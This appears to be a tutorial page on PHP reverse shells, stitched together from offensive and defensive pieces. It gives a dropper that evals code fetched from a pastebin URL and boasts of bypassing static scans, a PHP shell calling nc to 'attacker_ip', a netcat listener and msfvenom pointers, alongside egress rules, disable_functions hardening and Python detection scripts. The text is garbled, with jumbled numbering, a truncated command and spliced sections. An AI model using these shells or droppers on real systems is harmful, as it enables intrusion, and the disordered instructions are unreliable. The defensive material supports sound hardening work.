Reverse Shell Php
A PHP reverse shell is a script that, when executed on a target web server, initiates an outbound connection back to your machine, providing a command-line interface to the server. This technique is commonly used during penetration testing to gain interactive access after discovering a file upload or code execution vulnerability.
1. Obtain a Reverse Shell Script
The most reliable way to establish a connection is to use an established, pre-written script.
Pentest Monkey PHP Reverse Shell: Widely considered the industry standard for PHP web shells. It provides a full interactive shell that supports interactive programs like ssh or su.
You can download it from the Pentest Monkey GitHub repository.
Kali Linux Local Copy: If you are using Kali Linux, a copy is already available at /usr/share/webshells/php/php-reverse-shell.php.
MSFVenom: You can generate a custom payload using Metasploit with the following command:
msfvenom -p php/meterpreter_reverse_tcp LHOST=
2. Configure the Script
Before uploading, you must edit the script to point back to your machine. Open the .php file in a text editor like nano. Locate the $ip and $port variables.
Change $ip to your attacking machine's IP address (use your VPN IP if on a platform like Hack The Box).
Set $port to any open port on your machine (e.g., 4444 or 1234).
3. Start a Listener
On your attacking machine, you must set up a listener to "catch" the incoming connection.
4. Multi-Stage Payloads
Instead of embedding the entire shell in one file, a small "dropper" PHP script fetches a secondary payload from a remote server:
<?php $code = file_get_contents('https://pastebin.com/raw/xyz123'); eval($code); ?>
This bypasses static file scans.
3. Restrict Outbound Connections (Egress Filtering)
- Use a firewall to block outbound traffic on suspicious ports (e.g., 4444, 1337, 9001, or any non-essential port).
- Allow only necessary outbound services (HTTP/HTTPS on 80/443, DNS on 53, etc.).
2. Monitor Outbound Traffic
Reverse shells require outbound connections. Use firewalls to restrict outbound traffic from your web server:
- Web servers should only talk to databases (port 3306, 5432) and maybe LDAP.
- Block all unsolicited outbound TCP connections to arbitrary high ports (>1024).
- Allow only port 80/443 to specific CDNs or APIs.
Example iptables rules:
iptables -A OUTPUT -p tcp --dport 4444 -j DROP
iptables -A OUTPUT -p tcp --dport 4445:5555 -j DROP
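The two DROP rules above block specific ports, but a shell that calls back on 443 slips past them, which is why the list above says to allow 80/443 only to named destinations. The following Python is an added example (not code from the original page) that turns that guidance into a default-deny egress allowlist, classifies constructed connection records against it, and renders the same allowlist as owner-scoped iptables rules. The record format, the addresses (RFC 5737 documentation ranges for the public ones) and the allowlist entries are all assumptions made up for the example.

```python
import ipaddress
from dataclasses import dataclass

# Egress allowlist for a web server, following the guidance above: databases,
# LDAP, the internal resolver, and HTTPS only to a named API/CDN range.
# Every address here is constructed for the example.
ALLOWED_EGRESS = [
    ("10.0.2.10/32", 3306, "tcp"),    # MySQL
    ("10.0.2.11/32", 5432, "tcp"),    # PostgreSQL
    ("10.0.2.20/32", 389, "tcp"),     # LDAP
    ("10.0.0.2/32", 53, "udp"),       # internal DNS resolver
    ("203.0.113.0/24", 443, "tcp"),   # hypothetical CDN/API range
]
WEB_USER = "www-data"


@dataclass
class Conn:
    user: str
    proc: str
    proto: str
    dst_ip: str
    dst_port: int


def parse_conn(line: str) -> Conn:
    """Parse one record of the constructed format
    '<time> user=<u> proc=<p> proto=<tcp|udp> src=<ip:port> dst=<ip:port>'."""
    fields = dict(tok.split("=", 1) for tok in line.split()[1:])
    dst_ip, dst_port = fields["dst"].rsplit(":", 1)
    return Conn(fields["user"], fields["proc"], fields["proto"], dst_ip, int(dst_port))


def is_allowed(conn: Conn) -> bool:
    addr = ipaddress.ip_address(conn.dst_ip)
    return any(conn.proto == proto and conn.dst_port == port
               and addr in ipaddress.ip_network(net)
               for net, port, proto in ALLOWED_EGRESS)


def classify(conn: Conn) -> str:
    """Default-deny policy: anything not on the allowlist is an alert. The
    high-port case is tagged separately because it is the classic reverse
    shell signature; the 443 case shows why port blocking alone is not enough."""
    if conn.user != WEB_USER:
        return "ignore"  # not the web server's identity; out of scope here
    if is_allowed(conn):
        return "allow"
    if conn.dst_port > 1024:
        return "alert:high-port-egress"
    return "alert:unlisted-egress"


def analyze(log_text: str) -> list:
    """Return (process, dst_ip, dst_port, verdict) for every record."""
    return [(c.proc, c.dst_ip, c.dst_port, classify(c))
            for c in map(parse_conn, log_text.strip().splitlines())]


def iptables_rules(user: str = WEB_USER) -> list:
    """Render the allowlist as an iptables default-deny policy scoped to the
    web server's uid. This extends the page's two DROP rules into an allowlist;
    '-m owner --uid-owner' is a real iptables match."""
    rules = ["iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT"]
    for net, port, proto in ALLOWED_EGRESS:
        rules.append(f"iptables -A OUTPUT -m owner --uid-owner {user} "
                     f"-p {proto} -d {net} --dport {port} -j ACCEPT")
    rules.append(f"iptables -A OUTPUT -m owner --uid-owner {user} -j DROP")
    return rules


# Constructed connection records (not real traffic).
SAMPLE_LOG = """
2024-05-01T10:00:01Z user=www-data proc=php-fpm proto=tcp src=10.0.1.5:51822 dst=10.0.2.10:3306
2024-05-01T10:00:02Z user=www-data proc=php-fpm proto=tcp src=10.0.1.5:51823 dst=203.0.113.7:443
2024-05-01T10:00:03Z user=www-data proc=nc proto=tcp src=10.0.1.5:51824 dst=198.51.100.9:4444
2024-05-01T10:00:04Z user=www-data proc=php-fpm proto=tcp src=10.0.1.5:51825 dst=198.51.100.9:443
2024-05-01T10:00:05Z user=root proc=apt-get proto=tcp src=10.0.1.5:51826 dst=203.0.113.50:443
"""

if __name__ == "__main__":
    for proc, ip, port, verdict in analyze(SAMPLE_LOG):
        print(f"{proc:8} -> {ip}:{port:<5} {verdict}")
    print("\n".join(iptables_rules()))
```

Run as-is, the third record (a child process reaching out to a high port) and the fourth (HTTPS to an address that is not on the CDN/API list) both produce alerts, while the database and CDN connections pass. The generated rule set should be reviewed before loading; in particular the ESTABLISHED,RELATED rule assumes the conntrack module is available.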
2. Disable Dangerous PHP Functions
In php.ini, set:
disable_functions = exec, shell_exec, system, passthru, popen, proc_open, pcntl_exec, fsockopen, pfsockopen, socket_create
Note: Many reverse shells use fsockopen or socket_create. Disabling these breaks a wide range of shells.
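Two checks a defender wants alongside the php.ini setting above: whether a given php.ini actually leaves any of the listed functions callable, and a static review of uploaded PHP that catches the "dropper" pattern from the multi-stage section (eval() of remotely fetched code), since eval is a language construct and disable_functions cannot block it. The Python below is an added example, not code from the original page; the regular expressions, the constructed php.ini excerpts and the placeholder dropper string are all assumptions made for the demonstration.

```python
import re

# Functions the hardening section above says to disable; all of them are
# process- or socket-creating primitives that PHP web shells rely on.
SHELL_FUNCTIONS = {
    "exec", "shell_exec", "system", "passthru", "popen", "proc_open",
    "pcntl_exec", "fsockopen", "pfsockopen", "socket_create",
}

# Source patterns worth flagging in uploaded PHP. eval() is a language
# construct, so disable_functions cannot block it; it has to be caught in review.
DROPPER_RE = re.compile(
    r"\beval\s*\(\s*(?:\$\w+|file_get_contents|curl_exec|base64_decode|gzinflate|str_rot13)",
    re.IGNORECASE)
REMOTE_FETCH_RE = re.compile(r"\bfile_get_contents\s*\(\s*['\"]\s*https?://", re.IGNORECASE)
# Longest names first so that 'exec' never matches inside 'shell_exec'.
DANGEROUS_CALL_RE = re.compile(
    r"\b(" + "|".join(sorted(SHELL_FUNCTIONS, key=len, reverse=True)) + r")\s*\(",
    re.IGNORECASE)


def parse_disable_functions(ini_text: str) -> set:
    """Return the function names listed in php.ini's disable_functions.

    Comment lines (';' or '#') are skipped, quotes around the value are
    stripped, and the last uncommented assignment wins, as in php.ini itself.
    """
    disabled = set()
    for raw in ini_text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        m = re.match(r"disable_functions\s*=\s*(.*)$", line, re.IGNORECASE)
        if m:
            value = m.group(1).strip().strip("\"'")
            disabled = {f.lower() for f in re.split(r"[,\s]+", value) if f}
    return disabled


def still_enabled(ini_text: str) -> set:
    """Shell-relevant functions that this php.ini leaves callable."""
    return SHELL_FUNCTIONS - parse_disable_functions(ini_text)


def scan_php_source(src: str) -> list:
    """Flag lines of a PHP file that fetch remote code, eval dynamic strings,
    or call a process/socket primitive. Returns (line_no, tag) tuples."""
    findings = []
    for lineno, line in enumerate(src.splitlines(), 1):
        if DROPPER_RE.search(line):
            findings.append((lineno, "eval-of-dynamic-code"))
        if REMOTE_FETCH_RE.search(line):
            findings.append((lineno, "remote-fetch"))
        for m in DANGEROUS_CALL_RE.finditer(line):
            findings.append((lineno, "dangerous-call:" + m.group(1).lower()))
    return findings


# Constructed inputs for the demonstration.
WEAK_INI = """\
; php.ini excerpt (constructed)
disable_functions = exec, system
"""
HARDENED_INI = """\
disable_functions = "exec, shell_exec, system, passthru, popen, proc_open, pcntl_exec, fsockopen, pfsockopen, socket_create"
"""
# Placeholder dropper in the shape of the multi-stage example above; the URL is not real.
DROPPER_PHP = "<?php $code = file_get_contents('https://example.invalid/raw/placeholder'); eval($code); ?>"

if __name__ == "__main__":
    print("weak php.ini leaves enabled:", sorted(still_enabled(WEAK_INI)))
    print("hardened php.ini leaves enabled:", sorted(still_enabled(HARDENED_INI)))
    for lineno, tag in scan_php_source(DROPPER_PHP):
        print(f"dropper line {lineno}: {tag}")
```

The scanner is deliberately simple: it catches the plain dropper shape and the function names the page lists, which is what a pre-upload check or a periodic sweep of the web root needs most. Obfuscated variants (string concatenation, variable functions) need a real PHP parser or runtime monitoring, so treat the disable_functions check as the stronger of the two controls.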
PHP Reverse Shell Code
Here's an example of a simple PHP reverse shell code:
<?php
// Destination host and port for the outbound connection (placeholders).
$host = 'attacker_ip';
$port = 1234;
// Expose the child's stdin, stdout and stderr as pipes.
$descriptorspec = array(
    0 => array("pipe", "r"),
    1 => array("pipe", "w"),
    2 => array("pipe", "w")
);
$process = proc_open("nc $host $port", $descriptorspec, $pipes);
if (is_resource($process)) {
    // Relay whatever the child writes to stdout until it exits.
    while (!feof($pipes[1])) {
        $output = fread($pipes[1], 1024);
        echo $output;
    }
    fclose($pipes[0]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    proc_close($process);
}
?>
This code establishes a connection to the attacker's machine (attacker_ip:1234) using the nc command (Netcat). Once connected, the attacker can execute system commands on the victim's machine.
What is a Reverse Shell?
A reverse shell is a shell that runs on a victim's machine and connects back to the attacker's machine, allowing the attacker to execute commands remotely. Unlike a traditional shell, where the attacker initiates a connection to the victim's machine, a reverse shell initiates a connection from the victim's machine to the attacker's machine.
Step 1 – Attacker starts listener
nc -lvnp 4444
- -l: listen mode
- -v: verbose
- -n: no DNS resolution
- -p: port